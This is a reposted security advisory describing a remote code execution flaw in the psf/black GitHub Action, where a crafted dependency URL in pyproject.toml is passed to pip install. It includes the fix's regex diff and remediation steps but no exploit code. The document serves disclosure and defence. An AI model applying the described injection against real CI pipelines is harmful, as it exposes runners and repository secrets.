DEV Community

CVE Reports
CVE Reports

Posted on • Originally published at cvereports.com

GHSA-V53H-F6M7-XCGM: GHSA-V53H-F6M7-XCGM: Remote Code Execution in psf/black GitHub Action via pyproject.toml

#security #cve #cybersecurity #ghsa

GHSA-V53H-F6M7-XCGM: Remote Code Execution in psf/black GitHub Action via pyproject.toml

Vulnerability ID: GHSA-V53H-F6M7-XCGM
CVSS Score: 8.7
Published: 2026-03-07

A high-severity Remote Code Execution (RCE) vulnerability exists in the official GitHub Action for the Black Python code formatter (psf/black). The vulnerability arises from improper input validation within the Action's version parsing logic when reading pyproject.toml configuration files. By constructing a malicious dependency definition using PEP 508 direct references (e.g., pointing to a remote URL), an attacker can inject arbitrary arguments into the underlying pip install command. This flaw allows unauthorized code execution within the context of the GitHub Actions runner, potentially compromising CI/CD pipelines and secrets.

TL;DR

The psf/black GitHub Action is vulnerable to RCE when use_pyproject is enabled. Attackers can modify pyproject.toml in a Pull Request to include a malicious dependency URL, which the Action unsafely passes to pip install, executing arbitrary code on the runner.

⚠️ Exploit Status: POC

Technical Details

  • CWE ID: CWE-20
  • Attack Vector: Network
  • CVSS Score: 8.7 (High)
  • Affected Component: action/main.py
  • Exploit Status: Proof of Concept Available
  • Impact: Remote Code Execution

Affected Systems

  • GitHub Actions workflows using psf/black
  • CI/CD Pipelines parsing pyproject.toml
  • psf/black GitHub Action: < 0a2560b (Commit) (Fixed in: 0a2560b (Commit))

Code Analysis

Commit: 0a2560b

Fixed vulnerable version parsing regex in action/main.py

- BLACK_VERSION_RE = re.compile(r"^black([^A-Z0-9._-]+.*)$", re.IGNORECASE)
+ BLACK_VERSION_RE = re.compile(r"^black((?:\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)...
Enter fullscreen mode Exit fullscreen mode

Exploit Details

Mitigation Strategies

  • Input Validation Hardening
  • Dependency Pinning
  • Least Privilege for CI/CD

Remediation Steps:

  1. Identify all GitHub Actions workflows using psf/black.
  2. Update the psf/black action to the latest stable release or pin to commit 0a2560b981364dde4c8cf8ce9d164c40669a8611.
  3. If immediate updating is not possible, disable the use_pyproject: true configuration option.
  4. Manually specify the Black version in the workflow file using the version key (e.g., version: "24.1.0") to bypass the vulnerable parsing logic.

References

Read the full report for GHSA-V53H-F6M7-XCGM on our website for more details including interactive diagrams and full exploit analysis.

Top comments (0)